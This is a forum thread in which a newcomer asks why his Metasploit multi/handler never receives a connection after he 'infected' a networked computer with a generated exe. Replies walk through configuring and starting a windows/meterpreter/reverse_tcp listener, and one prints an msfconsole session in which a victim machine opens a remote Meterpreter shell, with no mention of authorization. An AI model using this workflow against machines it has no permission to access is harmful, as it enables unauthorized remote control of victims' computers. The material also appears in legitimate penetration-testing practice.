Results 1 to 5 of 5

Thread: problem on metasploit

  1. #1
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    5

    Default problem on metasploit

    hy i`m kind of new arround here ...i followed a tutorial about metasploit on how to use the exploit/multi/handler...made the output.exe file ...infected the network conputer ..downloaded the exe file and the exploit wont start.
    when i execute "exploit" command it say`s:Starting the payload handler...
    Started reverse handler
    and doesnt go futher...
    any help is appreciated

  2. #2
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533

    Default

    Quote Originally Posted by LennyX View Post
    hy i`m kind of new arround here ...i followed a tutorial about metasploit on how to use the exploit/multi/handler...made the output.exe file ...infected the network conputer ..downloaded the exe file and the exploit wont start.
    when i execute "exploit" command it say`s:Starting the payload handler...
    Started reverse handler
    and doesnt go futher...
    any help is appreciated
    This doesn't look like a tutorial. I'm wondering why you posted in the "Howto's" section.
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

  3. #3
    Member hawaii67's Avatar
    Join Date
    Feb 2006
    Posts
    318

    Default

    Quote Originally Posted by LennyX View Post
    hy i`m kind of new arround here ...i followed a tutorial about metasploit on how to use the exploit/multi/handler...made the output.exe file ...infected the network conputer ..downloaded the exe file and the exploit wont start.
    when i execute "exploit" command it say`s:Starting the payload handler...
    Started reverse handler
    and doesnt go futher...
    any help is appreciated
    Could be a lot of reasons - start metasploit first, then execute the exe file.
    Is there a firewall in place? Is the routing ok? Is the exe file working at all?
    Don't eat yellow snow :rolleyes:

  4. #4
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Quote Originally Posted by LennyX View Post
    hy i`m kind of new arround here ...i followed a tutorial about metasploit on how to use the exploit/multi/handler...made the output.exe file ...infected the network conputer ..downloaded the exe file and the exploit wont start.
    when i execute "exploit" command it say`s:Starting the payload handler...
    Started reverse handler
    and doesnt go futher...
    any help is appreciated
    Could anyone please move this thread to either "Newbie area" or "Pentesting". Thanks

  5. #5
    Junior Member AnActivist's Avatar
    Join Date
    Apr 2009
    Posts
    77

    Default

    Hey LennyX,

    What hawaii67 said above is true but just to clear it up even more maybe:
    1. Check to make sure that you have configured all your ports correctly so that when the victim runs your .exe file that it sends the shell or command prompt to the right ip/port.
    2. Make sure that before you run the .exe file on the victims computer that you have already started listening on the correct ports.
    3. Then run the .exe file and watch the magic happen.

    I'm going to be trying to fully document this in another thread that I made but here is the just of what I just said.

    BEFORE .exe is executed on victim
    Code:
    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp 
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(handler) > set LHOST 192.168.1.100
    LHOST => 192.168.1.100
    msf exploit(handler) > set LPORT 4444
    LPORT => 4444
    msf exploit(handler) > exploit
    [*] Starting the payload handler...
    [*] Started reverse handler
    Note: that LHOST and LPORT are the same ip/port that my .exe will be connecting to

    AFTER victim executes .exe
    Code:
    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp 
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(handler) > set LHOST 192.168.1.100
    LHOST => 192.168.1.100
    msf exploit(handler) > set LPORT 4444
    LPORT => 4444
    msf exploit(handler) > exploit
    [*] Starting the payload handler...
    [*] Started reverse handler
    [*] Transmitting intermediate stager for over-sized stage...(191 bytes)
    [*] Sending stage (2650 bytes)
    [*] Sleeping before handling stage...
    [*] Uploading DLL (75787 bytes)...
    [*] Upload completed.
    [*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.103:1032)
    
    meterpreter >
    from there you can do what you will
    Hope this helps check out my thread in the coming days as I should have this same thing better documented.

    AA

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •